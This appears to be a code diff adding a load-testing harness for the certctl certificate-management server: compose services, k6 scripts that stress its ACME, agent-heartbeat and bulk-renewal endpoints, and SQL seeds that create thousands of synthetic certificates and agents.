volumes:
|
||||||
|
- ./k6/bulk_renewal.js:/scripts/bulk_renewal.js:ro
|
||||||
|
- ./results:/results
|
||||||
|
command:
|
||||||
|
- run
|
||||||
|
- --summary-export=/results/summary-bulk-renewal.json
|
||||||
|
- /scripts/bulk_renewal.js
|
||||||
|
|
||||||
|
k6-scale-acme:
|
||||||
|
image: grafana/k6:0.54.0
|
||||||
|
container_name: certctl-loadtest-k6-acme
|
||||||
|
profiles: ["scale"]
|
||||||
|
depends_on:
|
||||||
|
certctl-server:
|
||||||
|
condition: service_healthy
|
||||||
|
# ACME scenario doesn't depend on the SQL seeds (it hits the
|
||||||
|
# unauthenticated directory + nonce + ARI surface) but routing
|
||||||
|
# it through the same dependency chain keeps the compose
|
||||||
|
# ordering predictable across the three scale jobs.
|
||||||
|
scale-seed:
|
||||||
|
condition: service_completed_successfully
|
||||||
|
environment:
|
||||||
|
CERTCTL_ACME_DIRECTORY: https://certctl-server:8443/acme/profile/prof-test/directory
|
||||||
|
K6_INSECURE_SKIP_TLS_VERIFY: "true"
|
||||||
|
volumes:
|
||||||
|
- ./k6/acme_burst.js:/scripts/acme_burst.js:ro
|
||||||
|
- ./results:/results
|
||||||
|
command:
|
||||||
|
- run
|
||||||
|
- --summary-export=/results/summary-acme-burst.json
|
||||||
|
- /scripts/acme_burst.js
|
||||||
|
|
||||||
|
k6-scale-agent:
|
||||||
|
image: grafana/k6:0.54.0
|
||||||
|
container_name: certctl-loadtest-k6-agent
|
||||||
|
profiles: ["scale"]
|
||||||
|
depends_on:
|
||||||
|
certctl-server:
|
||||||
|
condition: service_healthy
|
||||||
|
scale-seed:
|
||||||
|
condition: service_completed_successfully
|
||||||
|
environment:
|
||||||
|
CERTCTL_BASE: https://certctl-server:8443
|
||||||
|
CERTCTL_TOKEN: load-test-token
|
||||||
|
K6_INSECURE_SKIP_TLS_VERIFY: "true"
|
||||||
|
# Match the seed's 5K-agent fleet.
|
||||||
|
K6_AGENT_FLEET: "5000"
|
||||||
|
volumes:
|
||||||
|
- ./k6/agent_storm.js:/scripts/agent_storm.js:ro
|
||||||
|
- ./results:/results
|
||||||
|
command:
|
||||||
|
- run
|
||||||
|
- --summary-export=/results/summary-agent-storm.json
|
||||||
|
- /scripts/agent_storm.js
|
||||||
|
|||||||
@@ -0,0 +1,183 @@
|
|||||||
|
// Phase 8 SCALE-H2 — ACME enrollment burst.
|
||||||
|
//
|
||||||
|
// What this measures:
|
||||||
|
// 200 concurrent VUs hammering the unauthenticated ACME directory
|
||||||
|
// + new-nonce + ARI surface for 5 minutes. The goal is the
|
||||||
|
// throughput ceiling for the entry-point handlers and the
|
||||||
|
// per-account rate-limit response shape Phase 5 added (RFC 8555
|
||||||
|
// §6.7 + RFC 7807 + the certctl-specific
|
||||||
|
// ErrACMEConcurrentOrdersExceeded path).
|
||||||
|
//
|
||||||
|
// What this does NOT measure (and why):
|
||||||
|
// - JWS-signed POST flows (new-account, new-order, finalize).
|
||||||
|
// k6 doesn't ship JWS, and bundling a Go signing helper into
|
||||||
|
// the k6 container would obscure the server-side latency the
|
||||||
|
// scenario is trying to pin. The existing
|
||||||
|
// `deploy/test/loadtest/k6/acme_flow.js` Phase 5 scenario
|
||||||
|
// made the same explicit trade-off; this Phase 8 burst scenario
|
||||||
|
// reuses the constraint. End-to-end JWS-signed conformance is
|
||||||
|
// gated by `make acme-rfc-conformance-test` (which uses lego
|
||||||
|
// against the same compose stack).
|
||||||
|
// - The actual order/finalize hot path. The newOrder handler's
|
||||||
|
// constant-time SCAN against acme_orders + the per-account
|
||||||
|
// concurrent-orders gate ARE useful to load-test, but require
|
||||||
|
// valid JWS to reach. The directory + new-nonce surface this
|
||||||
|
// scenario hits is what every ACME client transits BEFORE the
|
||||||
|
// signed flow — measuring it pins the server's headroom for
|
||||||
|
// the rest of the flow.
|
||||||
|
// - Issuer-side enrollment latency (DigiCert ACME, Let's Encrypt
|
||||||
|
// against a real prod CA, etc.). Same "load-testing someone
|
||||||
|
// else's API" carve-out as the API tier.
|
||||||
|
//
|
||||||
|
// What this DOES measure:
|
||||||
|
// - GET /acme/profile/{id}/directory throughput. Sustained 200
|
||||||
|
// concurrent VUs looping with no per-iteration sleep produces ~600-1000 req/s
|
||||||
|
// against this endpoint, well above what any production ACME
|
||||||
|
// client would generate but the right shape for finding the
|
||||||
|
// ceiling.
|
||||||
|
// - HEAD /acme/profile/{id}/new-nonce throughput. Nonce
|
||||||
|
// allocation is a hot path that writes one row to acme_nonces.
|
||||||
|
// - GET /acme/profile/{id}/renewal-info/{cert-id} 4xx fast path.
|
||||||
|
// Synthetic cert-id → handler returns 4xx without a DB lookup
|
||||||
|
// (cert-id is malformed at the parse layer). Measures the
|
||||||
|
// handler-front overhead under load.
|
||||||
|
// - 429 rate-limit response shape. The Phase 5 ACME per-account
|
||||||
|
// rate limit fires at sustained spike rates; the scenario pins
|
||||||
|
// that the 429 body is RFC 7807 with the
|
||||||
|
// "urn:ietf:params:acme:error:rateLimited" type. A regression
|
||||||
|
// that returned a plain text 429 or a different problem type
|
||||||
|
// would break ACME clients hard.
|
||||||
|
//
|
||||||
|
// Threshold contract:
|
||||||
|
// - directory p95 < 500ms, new-nonce p95 < 300ms, renewal-info
|
||||||
|
// p95 < 800ms — same as the Phase 5 acme_flow.js baselines.
|
||||||
|
// - 429 responses are EXPECTED at sustained 200 VU rate (the
|
||||||
|
// server's RFC-compliant rate limiter SHOULD kick in). The
|
||||||
|
// http_req_failed metric is tagged separately so 429s don't
|
||||||
|
// break the threshold; a separate `acme_rate_limited_count` Counter
|
||||||
|
// tracks them so the operator can see how often the limiter
|
||||||
|
// fires.
|
||||||
|
|
||||||
|
import http from 'k6/http';
|
||||||
|
import { check } from 'k6';
|
||||||
|
import { Counter, Trend } from 'k6/metrics';
|
||||||
|
import { textSummary } from 'https://jslib.k6.io/k6-summary/0.0.2/index.js';
|
||||||
|
|
||||||
|
const ACME_BASE = __ENV.CERTCTL_ACME_DIRECTORY ||
|
||||||
|
'https://certctl-server:8443/acme/profile/prof-test/directory';
|
||||||
|
|
||||||
|
// Custom metrics.
|
||||||
|
const directoryDuration = new Trend('acme_directory_duration', true);
|
||||||
|
const newNonceDuration = new Trend('acme_new_nonce_duration', true);
|
||||||
|
const renewalInfoDuration = new Trend('acme_renewal_info_duration', true);
|
||||||
|
const rateLimitedCount = new Counter('acme_rate_limited_count');
|
||||||
|
const rateLimitShapeOK = new Counter('acme_rate_limit_shape_ok');
|
||||||
|
|
||||||
|
export const options = {
|
||||||
|
scenarios: {
|
||||||
|
acme_burst: {
|
||||||
|
executor: 'constant-vus',
|
||||||
|
vus: parseInt(__ENV.K6_ACME_VUS || '200', 10),
|
||||||
|
duration: __ENV.K6_ACME_DURATION || '5m',
|
||||||
|
gracefulStop: '30s',
|
||||||
|
tags: { scenario: 'acme_burst' },
|
||||||
|
},
|
||||||
|
},
|
||||||
|
thresholds: {
|
||||||
|
'acme_directory_duration': ['p(95)<500'],
|
||||||
|
'acme_new_nonce_duration': ['p(95)<300'],
|
||||||
|
'acme_renewal_info_duration': ['p(95)<800'],
|
||||||
|
// 4xx (rate-limited or malformed-cert-id) is expected; 5xx is
|
||||||
|
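// not. Filter to status >= 500 for the failure floor.
// NOTE(review): no request in this script sets a `server_error` tag
// (only `scenario` and `step`), so this sub-metric appears to receive
// no samples and the threshold would always pass — confirm and wire
// up a real 5xx signal.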
|
||||||
|
'http_req_failed{scenario:acme_burst,server_error:true}': ['rate<0.001'],
|
||||||
|
},
|
||||||
|
insecureSkipTLSVerify: true,
|
||||||
|
summaryTrendStats: ['avg', 'min', 'med', 'p(95)', 'p(99)', 'max'],
|
||||||
|
};
|
||||||
|
|
||||||
|
export default function () {
|
||||||
|
// Step 1 — directory.
|
||||||
|
let res = http.get(ACME_BASE, {
|
||||||
|
tags: { scenario: 'acme_burst', step: 'directory' },
|
||||||
|
});
|
||||||
|
directoryDuration.add(res.timings.duration);
|
||||||
|
check(res, { 'directory 200': (r) => r.status === 200 });
|
||||||
|
|
||||||
|
if (res.status === 429) {
|
||||||
|
recordRateLimit(res);
|
||||||
|
return; // backoff this VU iteration
|
||||||
|
}
|
||||||
|
if (res.status !== 200) return;
|
||||||
|
|
||||||
|
const dir = res.json();
|
||||||
|
|
||||||
|
// Step 2 — new-nonce.
|
||||||
|
if (dir.newNonce) {
|
||||||
|
res = http.head(dir.newNonce, {
|
||||||
|
tags: { scenario: 'acme_burst', step: 'new_nonce' },
|
||||||
|
});
|
||||||
|
newNonceDuration.add(res.timings.duration);
|
||||||
|
if (res.status === 429) {
|
||||||
|
recordRateLimit(res);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
check(res, {
|
||||||
|
'new-nonce 200': (r) => r.status === 200,
|
||||||
|
'replay-nonce header present': (r) => !!r.headers['Replay-Nonce'],
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 3 — ARI synthetic 4xx fast path. Phase 4 added ARI
|
||||||
|
// (RFC 9773); this exercises the malformed-cert-id branch which
|
||||||
|
// returns a 4xx without a DB lookup. Pinning this here means a
|
||||||
|
// regression that turned the malformed path into a DB query
|
||||||
|
// would surface as a p95 spike.
|
||||||
|
if (dir.renewalInfo) {
|
||||||
|
res = http.get(dir.renewalInfo + '/aaaa.bbbb', {
|
||||||
|
tags: { scenario: 'acme_burst', step: 'renewal_info' },
|
||||||
|
});
|
||||||
|
renewalInfoDuration.add(res.timings.duration);
|
||||||
|
if (res.status === 429) {
|
||||||
|
recordRateLimit(res);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
check(res, {
|
||||||
|
'renewal-info 4xx for synthetic cert-id':
|
||||||
|
(r) => r.status === 400 || r.status === 404,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// recordRateLimit pins the Phase 5 ACME rate-limit response shape:
|
||||||
|
// - HTTP 429
|
||||||
|
// - Content-Type: application/problem+json
|
||||||
|
// - Body: {"type":"urn:ietf:params:acme:error:rateLimited", ...}
|
||||||
|
// A regression that returned a plain-text 429 or a different
|
||||||
|
// problem type would NOT increment acme_rate_limit_shape_ok and the
|
||||||
|
// operator would see (acme_rate_limited_count - acme_rate_limit_shape_ok) > 0 in
|
||||||
|
// the summary.
|
||||||
|
function recordRateLimit(res) {
|
||||||
|
rateLimitedCount.add(1);
|
||||||
|
const ct = res.headers['Content-Type'] || '';
|
||||||
|
if (!ct.includes('application/problem+json')) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
let body;
|
||||||
|
try {
|
||||||
|
body = res.json();
|
||||||
|
} catch (e) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
if (body && typeof body.type === 'string' &&
|
||||||
|
body.type.startsWith('urn:ietf:params:acme:error:rateLimited')) {
|
||||||
|
rateLimitShapeOK.add(1);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// handleSummary is k6's end-of-test hook. It returns a map of output
// destination -> content: the raw summary as pretty-printed JSON, a
// colourless text rendering for the results directory, and a coloured
// text rendering for stdout.
export function handleSummary(data) {
  const outputs = {};
  outputs['/results/summary-acme-burst.json'] = JSON.stringify(data, null, 2);
  outputs['/results/summary-acme-burst.txt'] = textSummary(data, {
    indent: ' ',
    enableColors: false,
  });
  outputs.stdout = textSummary(data, { indent: ' ', enableColors: true });
  return outputs;
}
|
||||||
@@ -0,0 +1,126 @@
|
|||||||
|
// Phase 8 SCALE-H2 — agent fleet heartbeat storm.
|
||||||
|
//
|
||||||
|
// What this measures:
|
||||||
|
// 5,000 agents heartbeating at 30s intervals = ~167 heartbeats/sec
|
||||||
|
// sustained. Each heartbeat is POST /api/v1/agents/{id}/heartbeat
|
||||||
|
// with optional metadata. Pre-seeded fleet provided by
|
||||||
|
// deploy/test/loadtest/seed/02_agent_fleet.sql.
|
||||||
|
//
|
||||||
|
// What this does NOT measure:
|
||||||
|
// - The agent work-poll path (GET /api/v1/agents/{id}/work). The
|
||||||
|
// heartbeat hot path is the highest-frequency call on a typical
|
||||||
|
// fleet (work-poll cadence is 30s default like heartbeat, but
|
||||||
|
// work-poll returns the empty set 99% of the time and is cheap;
|
||||||
|
// heartbeat does an UPDATE on every call). v2 of the harness
|
||||||
|
// could combine them.
|
||||||
|
// - The agent CSR-submit path (POST /api/v1/agents/{id}/csr). That
|
||||||
|
// fires on per-cert issuance, not per heartbeat, and is exercised
|
||||||
|
// by the existing API tier's POST /api/v1/certificates scenario.
|
||||||
|
// - Auth-key per-agent rotation. The loadtest stack runs with a
|
||||||
|
// single api-key (`load-test-token`); per-agent api-key
|
||||||
|
// hashing/rotation isn't a load axis.
|
||||||
|
//
|
||||||
|
// Why constant-arrival-rate (not constant-vus):
|
||||||
|
// The point is to model what 5K real agents would offer the server
|
||||||
|
// at their native cadence. 5K agents * (1 heartbeat / 30s) =
|
||||||
|
// 166.67 req/s offered. constant-arrival-rate fires at exactly
|
||||||
|
// that rate regardless of latency; if the server backpressures,
|
||||||
|
// queue builds and p99 shows it. constant-vus would let slow
|
||||||
|
// responses block, masking the actual ceiling.
|
||||||
|
//
|
||||||
|
// Threshold contract:
|
||||||
|
// - p99 < 1s for the heartbeat POST. The handler does an UPDATE on
|
||||||
|
// agents.last_heartbeat_at (+ optional metadata columns) and an
|
||||||
|
// RBAC check. Even at 200 req/s a tight UPDATE on an indexed
|
||||||
|
// primary key should stay sub-second.
|
||||||
|
// - p95 < 500ms.
|
||||||
|
// - Error rate < 0.1%. The seeded agents are all status='Online'
|
||||||
|
// so no 410 Gone (retired-agent) responses; anything 4xx is a
|
||||||
|
// bug. 5xx is a server health regression.
|
||||||
|
//
|
||||||
|
// Phase 8 reference:
|
||||||
|
// - Source finding: SCALE-H2.
|
||||||
|
// - Pre-state: heartbeat path not load-tested. The ~10-agent demo
|
||||||
|
// seed in seed_demo.sql produces well under 1 heartbeat/sec, orders
|
||||||
|
// of magnitude below fleet scale.
|
||||||
|
|
||||||
|
import http from 'k6/http';
import { check } from 'k6';
import exec from 'k6/execution';
import { textSummary } from 'https://jslib.k6.io/k6-summary/0.0.2/index.js';
|
||||||
|
|
||||||
|
// Target server and bearer token, both overridable from the
// environment.
const BASE = __ENV.CERTCTL_BASE || 'https://certctl-server:8443';
const TOKEN = __ENV.CERTCTL_TOKEN || 'load-test-token';

// Offered load in heartbeats per second. 5000 agents at one heartbeat
// every 30s is 166.67 req/s; the default rounds that to 167.
const TARGET_RATE = parseInt(__ENV.K6_AGENT_RATE || '167', 10);

// Number of agents in the fleet seed. agentID() reduces its
// per-iteration index modulo this value so the per-row UPDATE pressure
// is spread across the table instead of landing on one hot row.
const FLEET_SIZE = parseInt(__ENV.K6_AGENT_FLEET || '5000', 10);

// Open-model scenario: iterations start at TARGET_RATE per second for
// five minutes regardless of response latency, using between 50 and
// 200 VUs.
const agentStormScenario = {
  executor: 'constant-arrival-rate',
  rate: TARGET_RATE,
  timeUnit: '1s',
  duration: '5m',
  preAllocatedVUs: 50,
  maxVUs: 200,
  exec: 'heartbeat',
  tags: { scenario: 'agent_storm' },
};

// Pass/fail contract: p99 < 1s, p95 < 500ms, failure rate < 0.1%.
const agentStormThresholds = {
  'http_req_duration{scenario:agent_storm}': ['p(99)<1000', 'p(95)<500'],
  'http_req_failed{scenario:agent_storm}': ['rate<0.001'],
};

export const options = {
  scenarios: { agent_storm: agentStormScenario },
  thresholds: agentStormThresholds,
  summaryTrendStats: ['avg', 'min', 'med', 'p(95)', 'p(99)', 'max'],
  // NOTE(review): presumably the loadtest stack serves a self-signed
  // certificate — confirm before reusing this file elsewhere.
  insecureSkipTLSVerify: true,
};
|
||||||
|
|
||||||
|
// agentID returns a deterministic agent id from the loadtest fleet
// seed ('ag-loadtest-00001' .. 'ag-loadtest-<FLEET_SIZE>'), walking
// the fleet round-robin so the UPDATE pressure hits every row equally
// rather than the same hot row over and over.
//
// Returns: the id string for the current iteration.
function agentID() {
  // exec.scenario.iterationInTest is k6's zero-based iteration counter
  // for the whole scenario, unique across VUs. The earlier per-VU
  // formula, (__VU * 1000 + __ITER) % FLEET_SIZE, was not unique per
  // call: with the default 5000-agent fleet, __VU * 1000 collapses to
  // only five distinct offsets, so VUs 1, 6, 11, ... walked the same
  // rows. With the scenario-wide counter, consecutive iterations hit
  // consecutive agents, and at the default rate each agent is hit
  // roughly once per 30s.
  const idx = exec.scenario.iterationInTest % FLEET_SIZE;
  // Seed ids are 1-based and zero-padded to five digits.
  return 'ag-loadtest-' + String(idx + 1).padStart(5, '0');
}
|
||||||
|
|
||||||
|
// heartbeat is the scenario entry point: it POSTs one heartbeat for
// the agent chosen by agentID() and checks for a 2xx status.
export function heartbeat() {
  const agent = agentID();
  const suffix = agent.slice(-5);

  // The handler tolerates an empty body, but real agents report
  // version + hostname on every call, so the same metadata is sent
  // here. The hostname mirrors the one written by the fleet seed.
  const metadata = {
    version: '2.1.0',
    hostname: `loadtest-${suffix}.fleet.example.test`,
    os: 'linux',
    architecture: 'amd64',
  };

  const url = BASE + '/api/v1/agents/' + agent + '/heartbeat';
  const params = {
    headers: {
      'Content-Type': 'application/json',
      'Authorization': 'Bearer ' + TOKEN,
    },
    tags: { scenario: 'agent_storm' },
  };

  const res = http.post(url, JSON.stringify(metadata), params);

  const is2xx = (r) => r.status >= 200 && r.status < 300;
  check(res, { 'heartbeat 2xx': is2xx });
}
|
||||||
|
|
||||||
|
// handleSummary is k6's end-of-test hook. It returns a map of output
// destination -> content: the raw summary as pretty-printed JSON, a
// colourless text rendering for the results directory, and a coloured
// text rendering for stdout.
export function handleSummary(data) {
  const outputs = {};
  outputs['/results/summary-agent-storm.json'] = JSON.stringify(data, null, 2);
  outputs['/results/summary-agent-storm.txt'] = textSummary(data, {
    indent: ' ',
    enableColors: false,
  });
  outputs.stdout = textSummary(data, { indent: ' ', enableColors: true });
  return outputs;
}
|
||||||
@@ -0,0 +1,129 @@
|
|||||||
|
// Phase 8 SCALE-H2 — bulk-renewal under load.
|
||||||
|
//
|
||||||
|
// What this measures:
|
||||||
|
// POST /api/v1/certificates/bulk-renew throughput against a
|
||||||
|
// 10K-cert pre-seeded fleet. Each iteration POSTs a criteria-mode
|
||||||
|
// bulk-renew request scoped to the seeded fleet (by team_id and
|
||||||
|
// issuer_id) so the server enqueues N renewal jobs and returns a
|
||||||
|
// per-cert {certificate_id, job_id} envelope.
|
||||||
|
//
|
||||||
|
// Why criteria-mode (not certificate-ids mode):
|
||||||
|
// The seeded fleet shares stable criteria fields (team_id
|
||||||
|
// 't-platform', issuer_id 'iss-local'). Criteria-mode lets the
|
||||||
|
// scenario re-fire without maintaining a moving list of cert IDs.
|
||||||
|
// The seed also stamps `tags.batch = 'bulk-renewal'`, but the
|
||||||
|
// criteria type has no tag filter, so the request is only as
|
||||||
|
// narrowly scoped as those two IDs: a server without them matches
|
||||||
|
// nothing; one that has them will have matching certs renewed.
|
||||||
|
//
|
||||||
|
// What this does NOT measure:
|
||||||
|
// - The scheduler's renewal scan itself. The bulk-renew handler
|
||||||
|
// enqueues issuance jobs synchronously into the `jobs` table;
|
||||||
|
// the scheduler's `jobProcessorLoop` picks them up on its next
|
||||||
|
// tick. The DB write throughput is what's measured here; the
|
||||||
|
// job-execution path is bounded by per-issuer concurrency
|
||||||
|
// (CERTCTL_RENEWAL_CONCURRENCY=25 default) and isn't usefully
|
||||||
|
// amplified by adding more inbound bulk-renew calls.
|
||||||
|
// - Full POST → poll deployments → cert-served loop. Same v1/v2
|
||||||
|
// deferral as the connector-tier scenarios — needs the agent
|
||||||
|
// poll surface plumbed end-to-end.
|
||||||
|
//
|
||||||
|
// Threshold contract:
|
||||||
|
// - p99 < 5s, p95 < 2s for the bulk-renew POST. Each call walks
|
||||||
|
// the criteria, materializes the matching managed_certificates
|
||||||
|
// rows, inserts N rows into `jobs`, and returns the envelope.
|
||||||
|
// - Error rate < 1%. Anything 4xx/5xx counts.
|
||||||
|
//
|
||||||
|
// Phase 8 reference:
|
||||||
|
// - Source finding: SCALE-H2.
|
||||||
|
// - Pre-state: only the API tier (50 req/s POST /certificates +
|
||||||
|
// GET /certificates) and connector tier (per-target handshake)
|
||||||
|
// were measured. The bulk-renew hot path was uncovered.
|
||||||
|
// - Seed: deploy/test/loadtest/seed/01_bulk_renewal_certs.sql
|
||||||
|
// creates 10K rows with tags.batch='bulk-renewal'. The seed
|
||||||
|
// must run before this scenario; the scale-seed compose
|
||||||
|
// profile gates this.
|
||||||
|
|
||||||
|
import http from 'k6/http';
|
||||||
|
import { check } from 'k6';
|
||||||
|
import { textSummary } from 'https://jslib.k6.io/k6-summary/0.0.2/index.js';
|
||||||
|
|
||||||
|
// Target server and bearer token, both overridable from the
// environment.
const BASE = __ENV.CERTCTL_BASE || 'https://localhost:8443';
const TOKEN = __ENV.CERTCTL_TOKEN || 'load-test-token';

// Sustained throughput target: constant-arrival-rate at 5 req/s for
// 5 minutes = 1500 bulk-renew POSTs. Each POST can scan up to 10K
// managed_certificates rows and insert up to 10K rows into `jobs`, so
// the request rate is far below the API tier's 50 req/s while the
// per-call cost is far larger.
//
// Why 5 req/s:
//   - At 50 req/s, stacked on the API tier's own 50, the demo-scale
//     compose's DB pool (CERTCTL_DATABASE_MAX_CONNS=50) saturates. The
//     Phase 8 scenario should measure the per-call ceiling without
//     fighting the pool.
//   - Each call enqueues thousands of jobs and the scheduler's
//     jobProcessorLoop has a finite per-tick budget. Going above
//     5 req/s would queue work faster than the scheduler drains it;
//     that transient backlog is worth measuring eventually but is not
//     what SCALE-H2 asks for.
const bulkRenewalScenario = {
  executor: 'constant-arrival-rate',
  rate: 5,
  timeUnit: '1s',
  duration: '5m',
  preAllocatedVUs: 10,
  maxVUs: 30,
  exec: 'bulkRenewal',
  tags: { scenario: 'bulk_renewal' },
};

// Single-scenario thresholds, sized for the heavier per-call cost
// (DB scan + N inserts): p99 < 5s, p95 < 2s, failure rate < 1%.
const bulkRenewalThresholds = {
  'http_req_duration{scenario:bulk_renewal}': ['p(99)<5000', 'p(95)<2000'],
  'http_req_failed{scenario:bulk_renewal}': ['rate<0.01'],
};

export const options = {
  scenarios: { bulk_renewal: bulkRenewalScenario },
  thresholds: bulkRenewalThresholds,
  summaryTrendStats: ['avg', 'min', 'med', 'p(95)', 'p(99)', 'max'],
  // NOTE(review): presumably the loadtest stack serves a self-signed
  // certificate — confirm before reusing this file elsewhere.
  insecureSkipTLSVerify: true,
};
|
||||||
|
|
||||||
|
// bulkRenewal is the scenario entry point: it POSTs one criteria-mode
// bulk-renew request and checks for a 2xx status.
export function bulkRenewal() {
  // Scope by team_id: the seed binds every loadtest cert to
  // t-platform, and team scoping is the typical bulk-renew shape in a
  // multi-tenant production deploy. This exercises both the criteria
  // walker and the team-scoped permission check in the handler.
  //
  // `tags` is deliberately absent: the BulkRenewalCriteria domain type
  // (handler/bulk_renewal.go) exposes only profile_id, owner_id,
  // agent_id, issuer_id, team_id and certificate_ids, with no
  // tag-based filtering. The team_id scope plus the
  // production-separated FK is what confines the request to the
  // Phase 8 seed.
  const criteria = {
    team_id: 't-platform',
    issuer_id: 'iss-local',
  };

  const url = BASE + '/api/v1/certificates/bulk-renew';
  const params = {
    headers: {
      'Content-Type': 'application/json',
      'Authorization': 'Bearer ' + TOKEN,
    },
    tags: { scenario: 'bulk_renewal' },
  };

  const res = http.post(url, JSON.stringify(criteria), params);

  const is2xx = (r) => r.status >= 200 && r.status < 300;
  check(res, { 'bulk-renew 2xx': is2xx });
}
|
||||||
|
|
||||||
|
// handleSummary is k6's end-of-test hook. It returns a map of output
// destination -> content: the raw summary as pretty-printed JSON, a
// colourless text rendering for the results directory, and a coloured
// text rendering for stdout.
export function handleSummary(data) {
  const outputs = {};
  outputs['/results/summary-bulk-renewal.json'] = JSON.stringify(data, null, 2);
  outputs['/results/summary-bulk-renewal.txt'] = textSummary(data, {
    indent: ' ',
    enableColors: false,
  });
  outputs.stdout = textSummary(data, { indent: ' ', enableColors: true });
  return outputs;
}
|
||||||
@@ -0,0 +1,85 @@
|
|||||||
|
-- Phase 8 SCALE-H2: bulk-renewal scenario seed.
|
||||||
|
--
|
||||||
|
-- Generates 10,000 managed_certificates rows linked to the existing
|
||||||
|
-- seed_demo.sql FKs (iss-local, o-alice, t-platform, rp-standard) so
|
||||||
|
-- the bulk-renewal k6 scenario can POST /api/v1/certificates/bulk-renew
|
||||||
|
-- against a fleet-scale dataset instead of the 15-row demo seed.
|
||||||
|
--
|
||||||
|
-- Behavior:
|
||||||
|
-- - Idempotent. ON CONFLICT (name) DO NOTHING — re-running the seed
|
||||||
|
-- against an already-seeded DB is a no-op.
|
||||||
|
-- - expires_at is uniformly distributed across the next 30 days so
|
||||||
|
-- a renewal_window_days = 30 policy considers every row eligible.
|
||||||
|
-- - status = 'active' so the renewal selector treats them as
|
||||||
|
-- live (the scheduler skips status IN ('pending', 'failed',
|
||||||
|
-- 'revoked', 'retired')).
|
||||||
|
-- - name is generated as 'loadtest-bulk-NNNNN.example.test' for a
|
||||||
|
-- stable, predictable identifier that marks the seeded set (the
|
||||||
|
-- production fleet wouldn't share this prefix); the confirmation
|
||||||
|
-- block at the end of this file counts rows by it.
|
||||||
|
--
|
||||||
|
-- Volume target: 10,000 rows. Insert wall time on the loadtest stack
|
||||||
|
-- (postgres:16-alpine, 2 CPU / 4 GiB): typically < 5 seconds via the
|
||||||
|
-- single-statement generate_series + INSERT pattern below. The
|
||||||
|
-- compose seed-init container runs this BEFORE the k6 driver starts,
|
||||||
|
-- so the steady-state load measurement isn't affected by seed time.
|
||||||
|
--
|
||||||
|
-- Why not generated in Go via a fixtures helper:
|
||||||
|
-- - The certctl-server boots from a clean DB and runs migrations +
|
||||||
|
-- seed_demo.sql automatically when CERTCTL_DEMO_SEED=true. Adding
|
||||||
|
-- a Go-side fixtures helper would require either (a) a new
|
||||||
|
-- CERTCTL_LOADTEST_SEED flag wired into cmd/server/main.go (cross-
|
||||||
|
-- cutting change for one test path) or (b) a separate seed binary
|
||||||
|
-- (more compose surface). Raw SQL is the smallest viable change.
|
||||||
|
--
|
||||||
|
-- Phase 8 entry point — runs only when the loadtest compose stack is
|
||||||
|
-- explicitly opted into the scale-seed via LOADTEST_SCALE_SEED=true.
|
||||||
|
|
||||||
|
-- Insert 10,000 loadtest certificates in a single statement. The
-- derived table computes the zero-padded sequence suffix and the FQDN
-- once per row; the outer SELECT reuses the FQDN for name, common_name
-- and the single SAN entry.
INSERT INTO managed_certificates (
    id,
    name,
    common_name,
    sans,
    environment,
    owner_id,
    team_id,
    issuer_id,
    renewal_policy_id,
    status,
    expires_at,
    tags,
    created_at,
    updated_at
)
SELECT
    'cert-loadtest-bulk-' || seq.suffix,
    seq.fqdn,
    seq.fqdn,
    ARRAY[seq.fqdn],
    'loadtest',
    'o-alice',
    't-platform',
    'iss-local',
    'rp-standard',
    'active',
    -- Offsets of 0-29 days plus 0-23 hours, so every row expires
    -- inside the next 30 days and a 30-day-window renewal policy sees
    -- all of them as eligible.
    NOW() + ((seq.n % 30) || ' days')::interval + ((seq.n % 24) || ' hours')::interval,
    jsonb_build_object('source', 'loadtest-phase8', 'batch', 'bulk-renewal'),
    NOW(),
    NOW()
FROM (
    SELECT
        n,
        lpad(n::text, 5, '0') AS suffix,
        'loadtest-bulk-' || lpad(n::text, 5, '0') || '.example.test' AS fqdn
    FROM generate_series(1, 10000) AS series(n)
) AS seq
-- Re-running against an already-seeded DB skips rows whose name exists.
ON CONFLICT (name) DO NOTHING;
|
||||||
|
|
||||||
|
-- Post-insert confirmation. Emits a NOTICE with the number of seeded
-- rows (matched by name prefix); the seed-init container greps for it
-- to verify the fleet shape. The line shows up in
-- `docker compose logs certctl-loadtest-scale-seed` after the run.
DO $$
DECLARE
    seeded_rows integer;
BEGIN
    seeded_rows := (
        SELECT COUNT(*)
        FROM managed_certificates
        WHERE name LIKE 'loadtest-bulk-%'
    );
    RAISE NOTICE 'Phase 8 bulk-renewal seed: % managed_certificates rows present', seeded_rows;
END $$;
|
||||||
@@ -0,0 +1,85 @@
|
|||||||
|
-- Phase 8 SCALE-H2: agent-fleet heartbeat-storm scenario seed.
|
||||||
|
--
|
||||||
|
-- Generates 5,000 agents rows so the heartbeat-storm k6 scenario can
|
||||||
|
-- model a fleet-scale heartbeat pattern (5K agents heartbeating at the
|
||||||
|
-- native 30s cadence = ~167 heartbeats/sec sustained) instead of the
|
||||||
|
-- ~10-agent demo seed.
|
||||||
|
--
|
||||||
|
-- Behavior:
|
||||||
|
-- - Idempotent. ON CONFLICT (id) DO NOTHING — re-runnable against an
|
||||||
|
-- already-seeded DB.
|
||||||
|
-- - name is unique (a UNIQUE constraint in migration 000001) so the
|
||||||
|
-- name suffix mirrors the id suffix.
|
||||||
|
-- - status = 'Online' so the heartbeat handler's retire-check
|
||||||
|
-- (service.ErrAgentRetired) doesn't 410 the storm.
|
||||||
|
-- - last_heartbeat_at staggered across the prior 60 seconds so the
|
||||||
|
-- stale-agent reaper (agentHealthCheckLoop) doesn't immediately
|
||||||
|
-- flip half the fleet to 'Offline' during the first scheduler
|
||||||
|
-- tick of the load run.
|
||||||
|
-- - api_key_hash = 'loadtest_no_auth'. The loadtest compose runs
|
||||||
|
-- CERTCTL_AUTH_TYPE=api-key with a single static token
|
||||||
|
-- (load-test-token), which bypasses per-agent key check the same
|
||||||
|
-- way the existing API tier scenarios do. Production deploys with
|
||||||
|
-- CERTCTL_AUTH_TYPE=agent-key per-agent would seed real bcrypt'd
|
||||||
|
-- hashes; this column is opaque to the load-test path.
|
||||||
|
-- - registered_at = NOW() - a 1-90 day interval (g % 90 + 1) so agent age
|
||||||
|
-- looks realistic and any age-based query plans are exercised.
|
||||||
|
--
|
||||||
